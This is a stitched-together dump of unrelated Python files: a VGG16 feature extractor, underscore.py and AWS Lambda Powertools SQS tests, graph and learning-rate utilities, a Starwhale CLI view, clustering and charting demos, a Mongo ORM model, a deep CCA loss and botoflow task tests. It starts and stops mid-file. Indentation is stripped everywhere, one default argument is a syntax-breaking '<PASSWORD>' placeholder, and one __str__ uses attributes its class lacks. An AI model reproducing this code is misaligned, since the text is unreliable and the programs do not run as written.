for param in self.parameters():
param.requires_grad = False
def forward(self, x):
results = []
layers_of_interest = {3, 8, 15, 22}
for i, layer in enumerate(self.layers):
x = layer(x)
if i in layers_of_interest:
results.append(x)
return results
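# Editorial usage sketch (not part of the original module): a random batch
# produces four feature maps, one after each of the layers at indices
# 3, 8, 15 and 22 (the relu1_2/relu2_2/relu3_3/relu4_3 activations of VGG16).
# Note that instantiating Vgg16 downloads the pretrained torchvision weights.
def _example_vgg16_features():
    model = Vgg16()
    features = model(torch.randn(1, 3, 224, 224))
    assert len(features) == 4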
|
497568 | import unittest
from src.underscore import _
class TestObjects(unittest.TestCase):
def test_keys(self):
self.assertEqual(set(_.keys({"one": 1, "two": 2})),
{'two', 'one'}, 'can extract the keys from an object')
def test_values(self):
self.assertEqual(set(_.values({"one": 1, "two": 2})),
{2, 1}, 'can extract the values from an object')
def test_functions(self):
obj = {"a": 'dash', "b": _.map, "c": ("/yo/"), "d": _.reduce}
self.assertEqual(['b', 'd'], _.functions(obj),
'can grab the function names of any passed-in object')
def test_extend(self):
self.assertEqual(_.extend({}, {"a": 'b'}).get("a"), 'b',
'can extend an object with the attributes of another')
self.assertEqual(_.extend({"a": 'x'}, {"a": 'b'}).get(
"a"), 'b', 'properties in source override destination')
self.assertEqual(_.extend({"x": 'x'}, {"a": 'b'}).get(
"x"), 'x', 'properties not in source dont get overriden')
result = _.extend({"x": 'x'}, {"a": 'a'}, {"b": 'b'})
self.assertEqual(result, {"x": 'x', "a": 'a', "b": 'b'},
'can extend from multiple source objects')
result = _.extend({"x": 'x'}, {"a": 'a', "x": 2}, {"a": 'b'})
self.assertEqual(result, {"x": 2, "a": 'b'},
'extending from multiple source'
' objects last property trumps')
result = _.extend({}, {"a": None, "b": None})
self.assertEqual(set(_.keys(result)),
{"a", "b"}, 'extend does not copy undefined values')
def test_pick(self):
result = _.pick({"a": 1, "b": 2, "c": 3}, 'a', 'c')
self.assertTrue(_.isEqual(result, {'a': 1, 'c': 3}),
'can restrict properties to those named')
result = _.pick({"a": 1, "b": 2, "c": 3}, ['b', 'c'])
self.assertTrue(_.isEqual(result, {"b": 2, "c": 3}),
'can restrict properties to those named in an array')
result = _.pick({"a": 1, "b": 2, "c": 3}, ['a'], 'b')
self.assertTrue(_.isEqual(result, {"a": 1, "b": 2}),
'can restrict properties to those named in mixed args')
def test_omit(self):
result = _.omit({"a": 1, "b": 2, "c": 3}, 'b')
self.assertEqual(result, {"a": 1, "c": 3},
'can omit a single named property')
result = _.omit({"a": 1, "b": 2, "c": 3}, 'a', 'c')
self.assertEqual(result, {"b": 2}, 'can omit several named properties')
result = _.omit({"a": 1, "b": 2, "c": 3}, ['b', 'c'])
self.assertEqual(result, {"a": 1},
'can omit properties named in an array')
def test_defaults(self):
options = {"zero": 0, "one": 1, "empty":
"", "nan": None, "string": "string"}
_.defaults(options, {"zero": 1, "one": 10, "twenty": 20})
self.assertEqual(options["zero"], 0, 'value exists')
self.assertEqual(options["one"], 1, 'value exists')
self.assertEqual(options["twenty"], 20, 'default applied')
_.defaults(options, {"empty": "full"},
{"nan": "none"}, {"word": "word"}, {"word": "dog"})
self.assertEqual(options["empty"], "", 'value exists')
self.assertTrue(_.isNone(options["nan"]), "NaN isn't overridden")
self.assertEqual(options["word"], "word",
'new value is added, first one wins')
def test_clone(self):
moe = {"name": 'moe', "lucky": [13, 27, 34]}
clone = _.clone(moe)
self.assertEqual(clone["name"], 'moe',
                         'the clone has the attributes of the original')
clone["name"] = 'curly'
self.assertTrue(clone["name"] == 'curly' and moe["name"] == 'moe',
'clones can change shallow attributes'
' without affecting the original')
clone["lucky"].append(101)
self.assertEqual(_.last(moe["lucky"]), 101,
'changes to deep attributes are'
' shared with the original')
self.assertEqual(_.clone(1), 1,
'non objects should not be changed by clone')
self.assertEqual(_.clone(None), None,
'non objects should not be changed by clone')
def test_isEqual(self):
obj = {"a": 1, "b": 2}
self.assertTrue(_.isEqual(obj, {"a": 1, "b": 2}), "Object is equal")
obj = {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}}
self.assertTrue(_.isEqual(
obj, {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}}),
"Object is equal")
obj = [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]]
self.assertTrue(
_.isEqual(obj, [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]]),
"Object is equal")
obj = None
self.assertTrue(_.isEqual(obj, None), "Object is equal")
obj = 1
self.assertTrue(_.isEqual(obj, 1), "Object is equal")
obj = "string"
self.assertTrue(_.isEqual(obj, "string"), "Object is equal")
def test_isEmpty(self):
self.assertTrue(not _([1]).isEmpty(), '[1] is not empty')
self.assertTrue(_.isEmpty([]), '[] is empty')
self.assertTrue(not _.isEmpty({"one": 1}), '{one : 1} is not empty')
self.assertTrue(_.isEmpty({}), '{} is empty')
self.assertTrue(_.isEmpty(None), 'null is empty')
self.assertTrue(_.isEmpty(), 'undefined is empty')
self.assertTrue(_.isEmpty(''), 'the empty string is empty')
self.assertTrue(not _.isEmpty('moe'), 'but other strings are not')
obj = {"one": 1}
obj.pop("one")
self.assertTrue(_.isEmpty(obj),
'deleting all the keys from an object empties it')
pass
def test_isType(self):
# put all the types here and check each for true
pass
class Namespace:
pass
def test_tap(self):
ns = self.Namespace()
ns.intercepted = None
def interceptor(obj):
ns.intercepted = obj
returned = _.tap(1, interceptor)
self.assertEqual(ns.intercepted, 1,
"passes tapped object to interceptor")
self.assertEqual(returned, 1, "returns tapped object")
returned = _([1, 2, 3]).chain().map(
lambda n, *args: n * 2).max().tap(interceptor).value()
self.assertTrue(returned == 6 and ns.intercepted == 6,
'can use tapped objects in a chain')
def test_pairs(self):
r = _.pairs({"one": 1, "two": 2})
self.assertEqual(sorted(r), [["one", 1], ["two", 2]],
'can convert an object into pairs')
def test_invert(self):
obj = {"first": 'Moe', "second": 'Larry', "third": 'Curly'}
r = _(obj).chain().invert().keys().join(' ').value()
self.assertEqual(set(r), set('Larry Moe Curly'),
'can invert an object')
self.assertEqual(_.invert(_.invert(obj)), obj,
"two inverts gets you back where you started")
def test_matches(self):
moe = {"name": '<NAME>', "hair": True}
curly = {"name": '<NAME>', "hair": False}
stooges = [moe, curly]
self.assertTrue(_.find(stooges, _.matches({"hair": False})) == curly,
"returns a predicate that can"
" be used by finding functions.")
self.assertTrue(_.find(stooges, _.matches(moe)) == moe,
"can be used to locate an object"
" exists in a collection.")
if __name__ == "__main__":
print("run these tests by executing `python -m unittest"
" discover` in unittests folder")
unittest.main()
|
497574 | from libs.config import alias
from libs.myapp import is_windows
from os import system
@alias(func_alias="cls")
def run():
"""
clear
Clear screen.
"""
if (is_windows(False)):
system("cls")
else:
system("clear")
|
497576 | import numpy as np
import pgl
import paddle.fluid as fluid
def to_undirected(graph):
""" to_undirected """
inv_edges = np.zeros(graph.edges.shape)
inv_edges[:, 0] = graph.edges[:, 1]
inv_edges[:, 1] = graph.edges[:, 0]
edges = np.vstack((graph.edges, inv_edges))
edges = np.unique(edges, axis=0)
# print(edges.shape)
g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges)
for k, v in graph._node_feat.items():
g._node_feat[k] = v
return g
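# Editorial usage sketch (not part of the original module): a three-node chain
# graph becomes symmetric after to_undirected, so each edge also appears in
# the reverse direction (2 edges in, 4 edges out).
def _example_to_undirected():
    g = pgl.graph.Graph(num_nodes=3, edges=np.array([[0, 1], [1, 2]]))
    assert to_undirected(g).edges.shape[0] == 4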
def add_self_loop(graph):
""" add_self_loop """
self_loop_edges = np.zeros((graph.num_nodes, 2))
self_loop_edges[:, 0] = self_loop_edges[:, 1]=np.arange(graph.num_nodes)
edges = np.vstack((graph.edges, self_loop_edges))
edges = np.unique(edges, axis=0)
# print(edges.shape)
g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges)
for k, v in graph._node_feat.items():
g._node_feat[k] = v
return g
def linear_warmup_decay(learning_rate, warmup_steps, num_train_steps):
""" Applies linear warmup of learning rate from 0 and decay to 0."""
with fluid.default_main_program()._lr_schedule_guard():
lr = fluid.layers.tensor.create_global_var(
shape=[1],
value=0.0,
dtype='float32',
persistable=True,
name="scheduled_learning_rate")
global_step = fluid.layers.learning_rate_scheduler._decay_step_counter()
with fluid.layers.control_flow.Switch() as switch:
with switch.case(global_step < warmup_steps):
warmup_lr = learning_rate * (global_step / warmup_steps)
fluid.layers.tensor.assign(warmup_lr, lr)
with switch.default():
decayed_lr = fluid.layers.learning_rate_scheduler.polynomial_decay(
learning_rate=learning_rate,
decay_steps=num_train_steps,
end_learning_rate=0.0,
power=1.0,
cycle=False)
fluid.layers.tensor.assign(decayed_lr, lr)
return lr, global_step
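# Editorial reference sketch (not part of the original module): the schedule
# assembled above is, in plain Python, a linear ramp from 0 to learning_rate
# over warmup_steps followed by a linear (power=1.0) decay to 0 at
# num_train_steps.
def _reference_warmup_decay(learning_rate, warmup_steps, num_train_steps, step):
    if step < warmup_steps:
        return learning_rate * step / warmup_steps
    progress = min(step, num_train_steps) / float(num_train_steps)
    return learning_rate * (1.0 - progress)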
def add_vnode(graph, num_vnode=1):
""" add_vnode """
num_nodes = graph.num_nodes + num_vnode
src = np.tile(np.arange(num_nodes), [num_vnode, 1]).reshape(-1)
dst = np.tile(np.arange(graph.num_nodes, num_nodes), [num_nodes, 1]).T.reshape(-1)
new_edges = np.stack([src, dst]).T
edges = np.vstack((graph.edges, new_edges))
g = pgl.graph.Graph(num_nodes=num_nodes, edges=edges)
for k, v in graph._node_feat.items():
new_feat = np.tile(v.mean(0), [num_vnode, 1])
print(new_feat.shape)
v = np.concatenate([v, new_feat])
g._node_feat[k] = v
return g
|
497591 | import os
import typing as t
from pathlib import Path
from starwhale.utils import console, in_production
from starwhale.consts import DefaultYAMLName, DEFAULT_PAGE_IDX, DEFAULT_PAGE_SIZE
from starwhale.base.uri import URI
from starwhale.base.type import URIType, EvalTaskType, InstanceType
from starwhale.base.view import BaseTermView
from starwhale.core.model.store import ModelStorage
from .model import Model, StandaloneModel
class ModelTermView(BaseTermView):
def __init__(self, model_uri: str) -> None:
super().__init__()
self.raw_uri = model_uri
self.uri = URI(model_uri, expected_type=URIType.MODEL)
self.model = Model.get_model(self.uri)
@BaseTermView._simple_action_print
def remove(self, force: bool = False) -> t.Tuple[bool, str]:
return self.model.remove(force)
@BaseTermView._simple_action_print
def recover(self, force: bool = False) -> t.Tuple[bool, str]:
return self.model.recover(force)
@BaseTermView._header
def info(self, fullname: bool = False) -> None:
self._print_info(self.model.info(), fullname=fullname)
@BaseTermView._pager
@BaseTermView._header
def history(
self, fullname: bool = False
) -> t.Tuple[t.List[t.Dict[str, t.Any]], t.Dict[str, t.Any]]:
fullname = fullname or self.uri.instance_type == InstanceType.CLOUD
return self._print_history(
title="Model History List", history=self.model.history(), fullname=fullname
)
def extract(self, force: bool = False, target_dir: str = "") -> None:
console.print(":oncoming_police_car: try to extract ...")
path = self.model.extract(force, target_dir)
console.print(f":clap: extracted @ {path.resolve()} :tada:")
@classmethod
def eval(
cls,
target: str,
yaml_name: str = DefaultYAMLName.MODEL,
typ: str = "",
kw: t.Dict[str, t.Any] = {},
) -> None:
if in_production() or (os.path.exists(target) and os.path.isdir(target)):
workdir = Path(target)
else:
uri = URI(target, URIType.MODEL)
store = ModelStorage(uri)
workdir = store.loc
if typ in (EvalTaskType.CMP, EvalTaskType.PPL):
console.print(f":golfer: try to eval {typ} @ {workdir}...")
StandaloneModel.eval_user_handler(
typ,
workdir,
yaml_name=yaml_name,
kw=kw,
)
else:
pass
@classmethod
@BaseTermView._pager
@BaseTermView._header
def list(
cls,
project_uri: str = "",
fullname: bool = False,
show_removed: bool = False,
page: int = DEFAULT_PAGE_IDX,
size: int = DEFAULT_PAGE_SIZE,
) -> t.Tuple[t.Dict[str, t.Any], t.Dict[str, t.Any]]:
_uri = URI(project_uri, expected_type=URIType.PROJECT)
fullname = fullname or (_uri.instance_type == InstanceType.CLOUD)
_models, _pager = Model.list(_uri, page, size)
BaseTermView._print_list(_models, show_removed, fullname)
return _models, _pager
@classmethod
def build(
cls, workdir: str, project: str, yaml_name: str = DefaultYAMLName.MODEL
) -> None:
_model_uri = cls.prepare_build_bundle(
workdir, project, yaml_name, URIType.MODEL
)
_m = Model.get_model(_model_uri)
_m.build(Path(workdir), yaml_name)
@classmethod
def copy(cls, src_uri: str, dest_uri: str, force: bool = False) -> None:
Model.copy(src_uri, dest_uri, force)
console.print(":clap: copy done.")
@BaseTermView._header
def tag(self, tags: str, remove: bool = False, quiet: bool = False) -> None:
_tags = tags.split(",")
if remove:
console.print(f":golfer: remove tags [red]{tags}[/] @ {self.uri}...")
self.model.remove_tags(_tags, quiet)
else:
console.print(f":surfer: add tags [red]{tags}[/] @ {self.uri}...")
self.model.add_tags(_tags, quiet)
|
497592 | from typing import Callable
from unittest.mock import patch
import pytest
from botocore.config import Config
from botocore.stub import Stubber
from aws_lambda_powertools.utilities.batch import PartialSQSProcessor, batch_processor, sqs_batch_processor
from aws_lambda_powertools.utilities.batch.exceptions import SQSBatchProcessingError
@pytest.fixture(scope="module")
def sqs_event_factory() -> Callable:
def factory(body: str):
return {
"messageId": "059f36b4-87a3-44ab-83d2-661975830a7d",
"receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a",
"body": body,
"attributes": {},
"messageAttributes": {},
"md5OfBody": "e4e68fb7bd0e697a0ae8f1bb342846b3",
"eventSource": "aws:sqs",
"eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue",
"awsRegion": "us-east-1",
}
return factory
@pytest.fixture(scope="module")
def record_handler() -> Callable:
def handler(record):
body = record["body"]
if "fail" in body:
raise Exception("Failed to process record.")
return body
return handler
@pytest.fixture(scope="module")
def config() -> Config:
return Config(region_name="us-east-1")
@pytest.fixture(scope="function")
def partial_processor(config) -> PartialSQSProcessor:
return PartialSQSProcessor(config=config)
@pytest.fixture(scope="function")
def partial_processor_suppressed(config) -> PartialSQSProcessor:
return PartialSQSProcessor(config=config, suppress_exception=True)
@pytest.fixture(scope="function")
def stubbed_partial_processor(config) -> PartialSQSProcessor:
processor = PartialSQSProcessor(config=config)
with Stubber(processor.client) as stubber:
yield stubber, processor
@pytest.fixture(scope="function")
def stubbed_partial_processor_suppressed(config) -> PartialSQSProcessor:
processor = PartialSQSProcessor(config=config, suppress_exception=True)
with Stubber(processor.client) as stubber:
yield stubber, processor
def test_partial_sqs_processor_context_with_failure(sqs_event_factory, record_handler, partial_processor):
"""
Test processor with one failing record
"""
fail_record = sqs_event_factory("fail")
success_record = sqs_event_factory("success")
records = [fail_record, success_record]
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
with partial_processor(records, record_handler) as ctx:
ctx.process()
assert len(error.value.child_exceptions) == 1
stubber.assert_no_pending_responses()
def test_partial_sqs_processor_context_only_success(sqs_event_factory, record_handler, partial_processor):
"""
Test processor without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("success")
records = [first_record, second_record]
with partial_processor(records, record_handler) as ctx:
result = ctx.process()
assert result == [
("success", first_record["body"], first_record),
("success", second_record["body"], second_record),
]
def test_partial_sqs_processor_context_multiple_calls(sqs_event_factory, record_handler, partial_processor):
"""
    Test processor invoked multiple times without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("success")
records = [first_record, second_record]
with partial_processor(records, record_handler) as ctx:
ctx.process()
with partial_processor([first_record], record_handler) as ctx:
ctx.process()
assert partial_processor.success_messages == [first_record]
def test_batch_processor_middleware_with_partial_sqs_processor(sqs_event_factory, record_handler, partial_processor):
"""
Test middleware's integration with PartialSQSProcessor
"""
@batch_processor(record_handler=record_handler, processor=partial_processor)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
assert len(error.value.child_exceptions) == 2
stubber.assert_no_pending_responses()
@patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor")
def test_sqs_batch_processor_middleware(
patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@sqs_batch_processor(record_handler=record_handler)
def lambda_handler(event, context):
return True
stubber, processor = stubbed_partial_processor
patched_sqs_processor.return_value = processor
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
assert len(error.value.child_exceptions) == 1
stubber.assert_no_pending_responses()
def test_batch_processor_middleware_with_custom_processor(capsys, sqs_event_factory, record_handler, config):
"""
Test middlewares' integration with custom batch processor
"""
class CustomProcessor(PartialSQSProcessor):
def failure_handler(self, record, exception):
print("Oh no ! It's a failure.")
return super().failure_handler(record, exception)
processor = CustomProcessor(config=config)
@batch_processor(record_handler=record_handler, processor=processor)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert len(error.value.child_exceptions) == 1
assert capsys.readouterr().out == "Oh no ! It's a failure.\n"
def test_batch_processor_middleware_suppressed_exceptions(
sqs_event_factory, record_handler, partial_processor_suppressed
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@batch_processor(record_handler=record_handler, processor=partial_processor_suppressed)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor_suppressed.client) as stubber:
stubber.add_response("delete_message_batch", response)
result = lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert result is True
def test_partial_sqs_processor_suppressed_exceptions(sqs_event_factory, record_handler, partial_processor_suppressed):
"""
Test processor without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("fail")
records = [first_record, second_record]
fail_record = sqs_event_factory("fail")
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor_suppressed.client) as stubber:
stubber.add_response("delete_message_batch", response)
with partial_processor_suppressed(records, record_handler) as ctx:
ctx.process()
assert partial_processor_suppressed.success_messages == [first_record]
@patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor")
def test_sqs_batch_processor_middleware_suppressed_exception(
patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor_suppressed
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@sqs_batch_processor(record_handler=record_handler)
def lambda_handler(event, context):
return True
stubber, processor = stubbed_partial_processor_suppressed
patched_sqs_processor.return_value = processor
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
stubber.add_response("delete_message_batch", response)
result = lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert result is True
def test_partial_sqs_processor_context_only_failure(sqs_event_factory, record_handler, partial_processor):
"""
Test processor with only failures
"""
first_record = sqs_event_factory("fail")
second_record = sqs_event_factory("fail")
records = [first_record, second_record]
with pytest.raises(SQSBatchProcessingError) as error:
with partial_processor(records, record_handler) as ctx:
ctx.process()
assert len(error.value.child_exceptions) == 2
|
497604 | from sklearn.cluster import MeanShift
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import style
style.use('ggplot')
# Create random data points whose centers are the following
centers = [[20, 0, 0], [0, 20, 0], [0, 0, 20], [0, 0, 0]]
X, _ = make_blobs(n_samples=200, centers=centers, cluster_std=2)
# Fit the data into MeanShift classifier with search bandwidth = 10
clf = MeanShift(bandwidth=10)
clf.fit(X)
# Get the labels of each data point
# and cluster centers of the number of clusters formed
labels = clf.labels_
cluster_centers = clf.cluster_centers_
print(cluster_centers)
n_clusters = len(cluster_centers)
print('Number of clusters found:', n_clusters)
# Plot the data points with their clusters and centers on a 3d graph
colors = 10*['r', 'g', 'b', 'y', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in range(len(X)):
ax.scatter(X[i][0], X[i][1], X[i][2], c=colors[labels[i]], marker='o')
ax.scatter(cluster_centers[:, 0], cluster_centers[:, 1], cluster_centers[:, 2],
marker='x', s=150, linewidth=5, zorder=10, color='k')
plt.show()
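# A minimal optional sketch: instead of hard-coding bandwidth=10, scikit-learn's
# estimate_bandwidth can pick a bandwidth from the data; quantile=0.2 is an assumed value here.
from sklearn.cluster import estimate_bandwidth
estimated_bandwidth = estimate_bandwidth(X, quantile=0.2)
print('Estimated bandwidth:', estimated_bandwidth)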
|
497615 | n = int(input())
a = list(map(int, input().split()))
b = list(map(int, input().split()))
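# The two vectors are orthogonal exactly when their dot product is zero,
# e.g. (1, 2) . (2, -1) = 1*2 + 2*(-1) = 0, so the answer would be 'Yes'.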
print('Yes' if sum(x * y for x, y in zip(a, b)) == 0 else 'No') |
497620 | from hippy.klass import def_class
from hippy.builtin_klass import k_Exception
k_LogicException = def_class('LogicException', [], extends=k_Exception)
k_BadFunctionCallException = def_class('BadFunctionCallException', [],
extends=k_LogicException)
k_BadMethodCallException = def_class('BadMethodCallException', [],
extends=k_BadFunctionCallException)
k_InvalidArgumentException = def_class('InvalidArgumentException', [],
extends=k_BadFunctionCallException)
k_DomainException = def_class('DomainException', [], extends=k_LogicException)
k_RuntimeException = def_class('RuntimeException', [], extends=k_Exception)
k_UnexpectedValueException = def_class('UnexpectedValueException', [],
extends=k_RuntimeException)
|
497624 | from setuptools import setup
from setuptools.extension import Extension
import numpy as np
import os
import re
from glob import glob
from pathlib import Path
with open(os.path.join(os.path.dirname(__file__), "econml", "_version.py")) as file:
for line in file:
m = re.fullmatch("__version__ = '([^']+)'\n", line)
if m:
version = m.group(1)
pyx_files = glob("econml/**/*.pyx", recursive=True)
c_files = glob("econml/**/*.c", recursive=True)
# If both a .pyx and a .c file exist, we assume the .c file is up to date and don't force a recompile
pyx_files = [file for file in pyx_files if (os.path.splitext(file)[0] + ".c") not in c_files]
c_extensions = [Extension(os.path.splitext(file)[0].replace(os.sep, '.'),
[file],
include_dirs=[np.get_include()])
for file in c_files]
if pyx_files:
from Cython.Build import cythonize
pyx_extensions = cythonize([Extension("*",
pyx_files,
include_dirs=[np.get_include()])],
language_level="3")
else:
pyx_extensions = []
# configuration is all pulled from setup.cfg
setup(ext_modules=c_extensions + pyx_extensions,
zip_safe=False,
version=version)
|
497671 | from utils.db.mongo_orm import *
class TestEnvParam(Model):
class Meta:
database = db
collection = 'testEnvParam'
# Fields
_id = ObjectIdField()
name = StringField(field_name='name')
paramValue = StringField(field_name='paramValue')
testEnvId = ObjectIdField()
description = StringField()
status = BooleanField(field_name='status', default=False)
projectId = ObjectIdField()
isDeleted = BooleanField(field_name='isDeleted', default=False)
createAt = DateField()
lastUpdateTime = DateField()
createUser = StringField()
lastUpdateUser = StringField()
def __str__(self):
return "key:{} - value:{} - testEnvId:{} - description:{} - projectId:{}" \
.format(self.key, self.value, self.testEnvId, self.description, self.projectId)
if __name__ == '__main__':
pass
|
497682 | import pytest
import aerosandbox.numpy as np
import casadi as cas
def test_norm_vector():
a = np.array([1, 2, 3])
cas_a = cas.DM(a)
assert np.linalg.norm(a) == np.linalg.norm(cas_a)
def test_norm_2D():
a = np.arange(9).reshape(3, 3)
cas_a = cas.DM(a)
assert np.linalg.norm(cas_a) == np.linalg.norm(a)
assert np.all(
np.linalg.norm(cas_a, axis=0) ==
np.linalg.norm(a, axis=0)
)
assert np.all(
np.linalg.norm(cas_a, axis=1) ==
np.linalg.norm(a, axis=1)
)
if __name__ == '__main__':
pytest.main()
|
497687 | import tensorflow as tf
from tensorflow.python.framework import ops
_trace_norm = tf.load_op_library('trace_norm.so')
@ops.RegisterGradient("TraceNorm")
def _trace_norm_grad(op, grad, g_u, g_v):
"""The gradients for `trace_norm`.
Args:
op: The `trace_norm` `Operation` that we are differentiating, which we can use
to find the inputs and outputs of the original op.
grad: Gradient with respect to the output of the `trace_norm` op.
Returns:
Gradients with respect to the input of `trace_norm`.
"""
# TODO: Ensure that we are only using the gradient of the trace norm.
# and not the `u' and `v' matrices.
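  # For A = U * diag(s) * V^T (thin SVD), the (sub)gradient of the nuclear norm
  # ||A||_* with respect to A is U V^T, so the incoming scalar gradient is simply
  # scaled by that matrix below.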
_, u, v = op.outputs
trace_grad = tf.matmul(u, v, transpose_b=True)
return [grad * trace_grad]
def regularize(inputs, regularisation):
return inputs + tf.ones_like(inputs) * regularisation
def correlation_cost(source, target, source_regularisation=0, target_regularisation=0, use_target=True):
num_source_samples = source.get_shape().as_list()[0]
num_target_samples = target.get_shape().as_list()[0]
# assert num_source_samples == num_target_samples
num_samples = tf.to_float(tf.shape(target)[0])
source -= tf.reduce_mean(source, 0)
target -= tf.reduce_mean(target, 0)
correlation_matrix = tf.matmul(source, target, transpose_a=True) / (num_samples - 1)
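  # Deep-CCA-style objective: whiten the cross-correlation with (Cholesky-based)
  # inverse square roots of the within-view covariances; the trace norm of the
  # resulting matrix approximates the sum of canonical correlations, and the
  # function returns its negative (up to the choice of matrix square root).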
source_covariance = regularize(tf.matmul(source, source, transpose_a=True) / (num_samples-1), source_regularisation)
# source_covariance = (tf.transpose(source_covariance) + source_covariance) / 2.
root_source_covariance = tf.cholesky(source_covariance)
inv_root_source_covariance = tf.matrix_inverse(root_source_covariance)
canonical_correlation = tf.matmul(inv_root_source_covariance, correlation_matrix)
if use_target:
target_covariance = regularize(tf.matmul(target, target, transpose_a=True) / (num_samples-1), source_regularisation)
root_target_covariance = tf.cholesky(target_covariance)
inv_root_target_covariance = tf.matrix_inverse(root_target_covariance)
canonical_correlation = tf.matmul(canonical_correlation, inv_root_target_covariance)
loss, u, v = _trace_norm.trace_norm(canonical_correlation)
return - loss |
497746 | import pyecharts.options as opts
from pyecharts.charts import Line
from pyecharts.faker import Faker
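# The series names "商家A"/"商家B" mean "Merchant A"/"Merchant B", and the
# title "Line-面积图" means "Line - area chart".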
c = (
Line()
.add_xaxis(Faker.choose())
.add_yaxis("商家A", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5))
.add_yaxis("商家B", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5))
.set_global_opts(title_opts=opts.TitleOpts(title="Line-面积图"))
.render("line_area_style.html")
)
|
497765 | import requests
from requests.auth import HTTPBasicAuth
from yelp_beans.data_providers.data_provider import DataProvider
class RestfulJSONDataProvider(DataProvider):
def __init__(self, url, username=None, password=<PASSWORD>, timeout=60.0):
self.url = url
self.username = username
self.password = password
self.timeout = timeout
def _authentication(self):
if self.username and self.password:
return HTTPBasicAuth(self.username, self.password)
def _fetch(self, data):
result = requests.get(
self.url,
auth=self._authentication(),
timeout=self.timeout,
)
result.raise_for_status()
return result.json()
|
497795 | import unittest
import logging
import pytest
from botoflow.core.async_event_loop import AsyncEventLoop
from botoflow.core.async_task import AsyncTask
from botoflow.core.decorators import task
from botoflow.core.base_future import BaseFuture
from botoflow.core.exceptions import CancellationError
from botoflow.logging_filters import BotoflowFilter
logging.basicConfig(level=logging.DEBUG,
format='%(filename)s:%(lineno)d (%(funcName)s) - %(message)s')
logging.getLogger('botoflow').addFilter(BotoflowFilter())
pytestmark = pytest.mark.usefixtures('core_debug')
class TestTask(unittest.TestCase):
def setUp(self):
self.counter = 0
self.except_called = False
self.finally_called = False
@task
def count(self):
self.counter += 1
def test_task(self):
ev = AsyncEventLoop()
with ev:
self.count()
ev.execute_all_tasks()
self.assertEqual(1, self.counter)
def test_two_tasks(self):
ev = AsyncEventLoop()
with ev:
self.count()
self.count()
ev.execute_all_tasks()
self.assertEqual(2, self.counter)
def test_recursive(self):
ev = AsyncEventLoop()
@task
def recursive(ct=10):
self.counter += 1
if ct == 1:
return
            ct -= 1
recursive(ct)
with ev:
recursive()
ev.execute_all_tasks()
self.assertEqual(10, self.counter)
def test_exceptions(self):
@task
def task_func():
raise RuntimeError("Test")
@task_func.do_except
def except_func(err):
self.except_called = True
@task_func.do_finally
def finally_func():
self.finally_called = True
ev = AsyncEventLoop()
with ev:
task_func()
ev.execute_all_tasks()
self.assertTrue(self.except_called)
self.assertTrue(self.finally_called)
def test_task_finally(self):
@task
def recursive(ct=1):
self.counter += 1
if ct == 1:
return
            ct -= 1
recursive(ct)
@task
def recursive_caller():
recursive()
@recursive_caller.do_finally
def finally_func():
self.finally_called = True
ev = AsyncEventLoop()
with ev:
recursive_caller()
ev.execute_all_tasks()
self.assertTrue(self.finally_called)
def test_tasks_finally(self):
@task
def recursive(ct=10):
if ct == 1:
return
            ct -= 1
recursive(ct)
@recursive.do_finally
def recursive():
self.counter += 1
ev = AsyncEventLoop()
with ev:
recursive()
ev.execute_all_tasks()
self.assertEqual(10, self.counter)
def test_finally_with_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def count():
                self.counter += 1
@count.do_finally
def count():
